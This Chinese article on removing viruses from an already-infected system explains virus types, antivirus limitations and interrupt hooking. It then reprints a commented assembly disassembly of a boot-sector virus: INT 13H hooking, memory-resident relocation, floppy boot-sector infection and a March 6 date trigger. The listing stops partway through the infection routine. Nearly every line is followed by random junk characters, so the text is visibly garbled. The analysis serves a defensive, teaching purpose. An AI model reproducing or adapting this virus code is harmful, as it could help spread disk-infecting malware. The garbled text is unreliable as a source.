近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 Mr5('9%
?? _Ewy^;S%L
?? 一 、 带毒环境下检测清除病毒的意义 xh+AZ3
?? "K}W^J9v
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 @1pW!AdN
?? X7XCZSh#A
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 zer&`Vr
?? N3XVT{yo
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 n}AR/3}
?? p"hm.=,
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 ++J Bbuzj!
?? {<-
ouD
?? 二 、带毒环境下检测清除病毒的原理 Ak\D6eHcB
?? <'>d0:>N
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 +BtLyQ
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 (]zl$*k
k=h/i8i2z
5p]urfN-f
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " mC{!8WC@k
病毒体: mFgb_Cd
JMP 01AF ;JMP到01AF #K<=xP
DB 00 ;病毒标计 uZqu xu.
DW 00F5 ;此为搬到高位址后,远程跳转指令 qHC*$v#.V?
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX ?{@!!te@3v
DB 02 i#@ v_^ q
DW 0003 ;此为软盘识别标记,硬盘为0007 \jF" nl
DW EC59 ; vc>^.#7
DW F000 ;INT 13H的原入口 %T&&x2p^=?
. uJ|5Ve
. IEIxjek
. UZ4tq
. 4 BE:&A
. {L-{Y<fke
XOR AX,AX ;清除AX wRV`v$*6
MOV DS,AX; ;让DS=0000 4AJu2Hp
CLI ;清I标志积存器 ;*>QG6Fh
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 ]Vf8mkDGO
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 ~
X]"P4 u
MOV SP,AX ;开机时为0000:7CB6 o5*74Mv
STI ;设I标志积存器 h|c:!VN@
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A T(sG.%
PUSH AX ;用RETF,把程序转到引导或分区表位置
Zi<Sw
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 JhMrm%
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 |(J
?#?
MOV AX,[004E] ;取INT 13H的段地址 Sg_-OX@f
MOV [7C0C],AX ;存到010C X_0{*!v8
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 oSu|Yn
;读写以便传播发作 ${TB2q}%
Gpxb_}P
MOV AX,[0413] ;取得内存K数,放在AX 6?<`wGs(
DEC AX ; , IMT '*
DEC AX ;减2k内存 :uT
fhr
MOV [0413],AX ;存回,通常是638K T_(e(5
MOV CL,06 ; =XRgT1>e
SHL AX,CL ; .^9/ 0.g8t
MOV ES,AX ;算出减2K后病毒本体的位址 ~Me&cT8
MOV [7C05],AX ;AX存入0105 /_zF?5h
Y>dg10=
;病毒常用手法将系统高段内存减少以便驻留 3-9J"d!
;这样可以免于被其他程序覆盖 @
@3)D%h
8CnvvMf
MOV AX,000E ;病毒拦INT 13H 2t]! {L
;ISR起始的偏移量 X*>o9J45V
MOV [004C],AX ; \DcC1W
MOV [004E],ES ;设原为病毒的INT 13H ys.!S.k+
MOV CX,01BE ;病毒长度为1BE RBv=
MOV SI,7C00 ;从JMP 01AF开始 mk[d7Yt{O
XOR DI,DI ;DI=0 #/XK&(X
CLD ;清方向标志 }'w^<:RSy
REPZ; R+ #.bQg
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 @0/@p"j
CS: ;分区表能载入0000:7C00正常运作 Ow($\,
JMP FAR [7C03] ;跳到为搬过后的位址 g1hg`qBBW
XOR AX,AX ;清AX Be14$7r
MOV ES,AX ;ES=0000 L3G)?rPFC#
INT 13 ;复位磁盘 gk_X u
PUSH CS ; zM8/s96h
POP DS ;让DS=CS A\PV@w%Ai
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 .f.j >
MOV BX,7C00 ;读到0000:7C00 sxC{\iLY%
MOV CX,[0008] ;硬盘第0道,第7扇区 S{"6PXzb
CMP CX,+07 ;比较是否从硬盘启动 g*w-"%"O
JNZ 0213 ;不是跳0213 -%/,j)VKD
MOV DX,0080 ;第一硬盘C:第零面 >ihe|WN
INT 13 ;用INT 13号中断,读 ZZFI\o
JMP 023E ;跳023E比较日期,发作或正常开机 9TXm Z
MOV CX,[0008] ;软盘0道,第3扇区 cVP49r}}v
MOV DX,0100 ;A:的第0面 k. ?
T.9
INT 13 ;INT 13读盘
8tFyNl`c
JB 023E ;失败跳023E $CQwBsYb=
PUSH CS EbwZZSds1
POPES ;让ES=CS (PT?h>|St
MOV AX,0201 ; ,rl
<ye*&
MOV BX,0200 ; "'H7F,k'
MOV CX,0001 ; k>z-Zg
MOV DX,0080 ; RQK**
INT 13 ;读入C:的分区表到0200,以便下面比较 whg4o|p
JB 023E ;失败跳023E bcx{_&1p
XOR SI,SI ;清SI C)3$";$5)
CLD ;清方向标志以便比较 tpx3:|
LODSW ;载入一个WORD到AX -)vp&-
CMP AX,[BX] ;比较有无病毒存在..E9AC n]ppO
U|[
JNZ 0287 ;没有则跳0287传染 c&I,eds
LODSW ;载入一个WORD到AX h> 5~
(n8
CMP AX,[BX+02] ;再次确认..0000 B|q3;P
JNZ 0287 ;没有跳0287 K7&8;So
XOR CX,CX ;清CX &_%+r5
MOV AH,04 ; <2@<r
t{
INT 1A ;取得日期 <hF~L k ,
CMP DX,0306 ;是否为三月六日 @9kk
f{?
JZ 024B ;是跳024B传染 8Jy1=R*S
RETF ;把程序交还给引导启动完成 W!Ct[t
y3o4%K8
步骤4:病毒INT 13代码分析 ~NW5+M(u
方法:U [2j(\vC!
PUSH DS ;首先把要用到积存器 \tw#pk
PUSH AX ;入栈保存 koWb@V]
OR DL,DL ;比较是否为软盘 B43#9CK`o
JNZ 002F ;如不是则退出传染 OrH1fhh
XOR AX,AX ;AX=0 YDzF( ']o:
MOV DS,AX ;数据代段=0 sp|y/r#
TEST BYTE PTR [043F],01 ;比较是否为A盘 ? Ge*~d
JNZ 002F ;不是则退出 m+gG &`&u
POP AX ;将以上保存积存器 pvwnza1
POP DS ;弹栈恢复 @okm@6J*X
PUSHF ;压栈标志积存器 4z3$
CS: ;以便执行原INT 13 _~#C $-T
CALL FAR [000A] ;执行原INT 13 X9`C2fyVd
PUSHF ;再次压栈 \3:{LOr%*
CALL 0036 ;以便跳转到传染程序 "}x70q'>S
POPF ;跳转到执行传染 `_{'?II
RETF 0002 ;结束中断调用返回 \3Ald.EqtM
POP AX ;恢复 @XG`D>%k
POP DS ;堆栈 L!8?2 \5
CS: ;跳转到原正常INT 13 W2.1xNWO
JMP FAR [000A] ;地址执行 [,A'
m"m;(T{ v
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 hpi_0lMkI
uu/7Ie
步骤5:传染过程分析 0@/E%T1c"
方法:U m&z%kVsg]
对软盘传染过程: NwuBe:"@
PUSH AX ;工 xg5@;p
PUSH BX ;作 au}0PnA;
PUSH CX ;寄 ,c %gwzU
PUSH DX ;存 I;m@cSJ|j
PUSH DS ;器 EV,NJ3V
PUSH ES ;入 ^l2d?v8
PUSH SI ;栈 _TcQ12H 5<
PUSH DI ;保存
! +VN
PUSH CS ;以压/弹栈方式 9DAwC:<r
POP DS ;使数据段DS和 FEi,^V
PUSH CS ;附加段ES均指向 -8kW!F
POP ES ;代码段CS Eq.zCD8A
MOV SI,0004 ;试4次 nhxd
MOV AX,0201 ;设置各 K[;,/:Y
MOV BX,0200 ;积存器 U[ O!&:6
MOV CX,0001 ;为读软盘 vc1GmB
XOR DX,DX ;引导扇区做准备 ~4X!8b_
PUSHF ;压栈标志积存器 /Ta0}Y(y
CALL FAR [000A] ;正常的INT 13调用 3)MM5
bb$
JNB 0063 ;成功则转判断 iC0,zk4 &
XOR AX,AX ;不成功复位 ~S{\wL53
PUSHF ;磁盘继续读 ZC-evy
CALL FAR [000A] ;如果4次 WoG
DEC SI ;均匀不成功 Oy`\8*Uy__
JNZ 0045 ;则退出跳转 exN#!&;
JMP 00A6 ;退出传染 oW1olmpp=
XOR SI,SI ;SI=0以便用 D~?*Xv]s~
CLD ;LODSW读入软盘 ZZJ"Ny.2
LODSW ;第1或第2字进行比较 YZtA:>;p
CMP AX,[BX] ;比较如果不包含病毒标志 ZTz(NS
EK
JNZ 0071 ;则跳转写传染 x3F L/^S
LODSW ;如果已有标志 #K*q(ei,7h
CMP AX,[BX+02] ;则退出 QS?9&+JM |
JZ 00A6 ;传染子程序 mb6?$1j
MOV AX,0301 ;为写盘准备 Y~?YA/.x
MOV DH,01 ;如果是360K | BWK"G
MOV CL,03 ;则写到1面0道3扇区 H9m2Whq
CMP BYTE PTR [BX+15],FD ;比较软盘 MZMv.OeYt,
JZ 0080 ;如果大于360K @ y2Bq['
MOV CL,0E ;写到1面0道14扇区 <